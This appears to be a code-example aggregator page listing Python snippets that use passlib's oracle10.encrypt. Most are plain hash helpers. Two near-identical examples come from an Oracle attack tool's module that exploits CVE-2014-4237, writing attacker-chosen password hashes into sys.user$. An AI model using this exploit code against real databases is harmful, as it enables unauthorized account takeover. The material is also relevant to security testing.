Esempio n. 1
0
 def generate(self, cli_object):
     if cli_object.username is None:
         print "You must provide a username for oracle10 hashes!"
         return "Oracle10 Hashes require a username"
     generatedhash = oracle10.encrypt(cli_object.plaintext,
                                      user=cli_object.username)
     return generatedhash
Esempio n. 2
0
def runCVEXXXYYYModule(args):
    '''
	Run the CVE_XXXX_YYYY module
	'''
    if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"],
                                  checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_XXXX_YYYY(args)
    status = cve.connection(stopIfError=True)
    if args['test-module'] == True:
        cve.testAll()
    if args['set-pwd-2014-4237'] != None:
        hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
        hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1],
                                   user=args['set-pwd-2014-4237'][0])
        logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(
            hash11g, hash10g, args['set-pwd-2014-4237'][0]))
        REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(
            args['set-pwd-2014-4237'][0], hash10g, hash11g)
        REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(
            args['set-pwd-2014-4237'][0], hash10g, hash11g)
        args['print'].title(
            "Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237"
            .format(args['set-pwd-2014-4237'][0], hash10g, hash11g))
        status = cve.exploit_CVE_2014_4237(
            updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237,
            updateRequestWithView=
            REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
        if status == True:
            cve.args['print'].goodNews(
                "The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!"
                .format(args['set-pwd-2014-4237'][0],
                        args['set-pwd-2014-4237'][1]))
        elif status == False:
            cve.args['print'].badNews(
                "The password of '{0}' has NOT been replaced".format(
                    args['set-pwd-2014-4237'][0]))
        elif status == None:
            cve.args['print'].goodNews(
                "The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!"
                .format(args['set-pwd-2014-4237'][0]))
Esempio n. 3
0
def runCVEXXXYYYModule(args):
	'''
	Run the CVE_XXXX_YYYY module
	'''
	if checkOptionsGivenByTheUser(args,["test-module","set-pwd-2014-4237"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
	cve = CVE_XXXX_YYYY(args)
	status = cve.connection(stopIfError=True)
	if args['test-module'] == True :
		cve.testAll()
	if args['set-pwd-2014-4237'] != None :
		hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
		hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0])
		logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, args['set-pwd-2014-4237'][0]))
		REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
		REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
		args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(args['set-pwd-2014-4237'][0],hash10g, hash11g))
		status = cve.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
		if status == True:
			cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(args['set-pwd-2014-4237'][0],args['set-pwd-2014-4237'][1]))
		elif status == False:
			cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(args['set-pwd-2014-4237'][0]))
		elif status == None:
			cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(args['set-pwd-2014-4237'][0]))
Esempio n. 4
0
 def digest(self):
     return unhexlify(oracle10.encrypt(self.data[:64], user=self._user))
Esempio n. 5
0
 def digest(self):
     return oracle10.encrypt(self._data[:64], user=self._user).decode('hex')
Esempio n. 6
0
 def generate(self, cli_object):
     if cli_object.username is None:
         print "You must provide a username for oracle10 hashes!"
         return "Oracle10 Hashes require a username"
     generatedhash = oracle10.encrypt(cli_object.plaintext, user=cli_object.username)    
     return generatedhash